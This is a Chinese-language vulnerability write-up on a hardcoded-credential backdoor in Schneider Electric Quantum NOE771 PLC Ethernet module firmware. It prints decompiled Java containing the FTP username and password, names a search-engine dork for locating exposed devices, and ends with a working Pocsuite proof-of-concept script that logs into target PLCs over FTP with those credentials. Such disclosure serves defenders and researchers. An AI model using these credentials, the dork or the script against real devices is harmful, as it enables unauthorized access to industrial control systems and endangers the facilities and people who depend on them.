通过分析设备固件可以得知,文件系统中包含硬编码方式保存的用户凭证信息。
这些信息主要用于提供对外的FTP服务升级服务。
其中,问题代码位于**/FLASH0/wwwroot/classes/SACommjar** 包中,具体的Package路径:
com.schneiderautomation.misc.TextFiles的第266行至268行位置。
package com.schneiderautomation.misc;
import com.schneiderautomation.ftpsession.FTPSession;
import com.schneiderautomation.ftpsession.FileInfo;
import com.schneiderautomation.ftpsession.FtpSessionException;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.Writer;
import java.net.URL;
import java.net.URLConnection;
import java.util.Locale;
import java.util.Vector;
public class TextFiles
{
private static final String USER = "sysdiag";
private static final String PASSWORD = "factorycast@schneider";
private boolean fAutoConnect = true;
private Thread engine = null;
private String host;
private Locale locale;
private FTPSession ftp;
....
private void connect()
throws IOException
{
if (this.fAutoConnect)
try
{
this.ftp = new FTPSession(this.locale);
this.ftp.connectHost(this.host);
this.ftp.login("sysdiag", "factorycast@schneider"); //CVE-2011-4859
}
catch (FtpSessionException localFtpSessionException)
{
if (this.ftp != null)
disconnect();
throw new IOException(localFtpSessionException.getMessage());
}
}
....
}
通过ZoomEye系统提供的Dork [“Schneider Web”] 可获悉部分设备在互联网上的部署情况,可通过FTP命令尝试登录验证。
引用:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ftplib
import urlparse
import socket
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register
class POC(POCBase):
vulID = '89384' # vul ID
version = '1'
author = 'Wyc'
vulDate = '2014-05-15'
createDate = '2015-09-05'
updateDate = '2015-09-09'
references = ['http://sebug.net/vuldb/ssvid-89384']
name = '施耐德(Schneider) PLC 以太网模块固件后门'
appPowerLink = 'http://www.schneider-electric.cn/zh/product-range/538-modicon-quantum?xtmc=Quantum&xtcr=1'
appName = 'Schneider Quantum NOE771'
appVersion = 'unkown'
vulType = 'backdoor'
desc = '''
Schneider Electric Quantum Ethernet模块对 (1) AUTCSE (2) AUT_CSE
(3) fdrusers (4) ftpuser(5)loader(6)nic2212(7)nimrohs2212
(8) nip2212(9)noe77111_v500(10) ntpupdate(11) pcfactory(12) sysdiag
(13) target(14) test(15) USER和(16) webserver accounts使用了硬编码方式输入密码,使得远程攻击者可借助
(a) TELNET(b) Windriver Debug或者(c) FTP端口获取访问。
'''
# the sample sites for examine
def _verify(self):
output = Output(self)
result = {}
target = socket.gethostbyname(urlparse.urlsplit(self.url)[1])
try:
ftp = ftplib.FTP(timeout=5)
ret = ftp.connect(host=target, port=21, timeout=5)
welcome = ftp.connect(host=target, port=21, timeout=5)
login = ftp.login(user='sysdiag', passwd='factorycast@schneider')
ls = ftp.nlst()
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
output.success(result)
except Exception, err:
output.fail('Internet Nothing returned')
return output
def _attack(self):
return self._verify()
register(POC)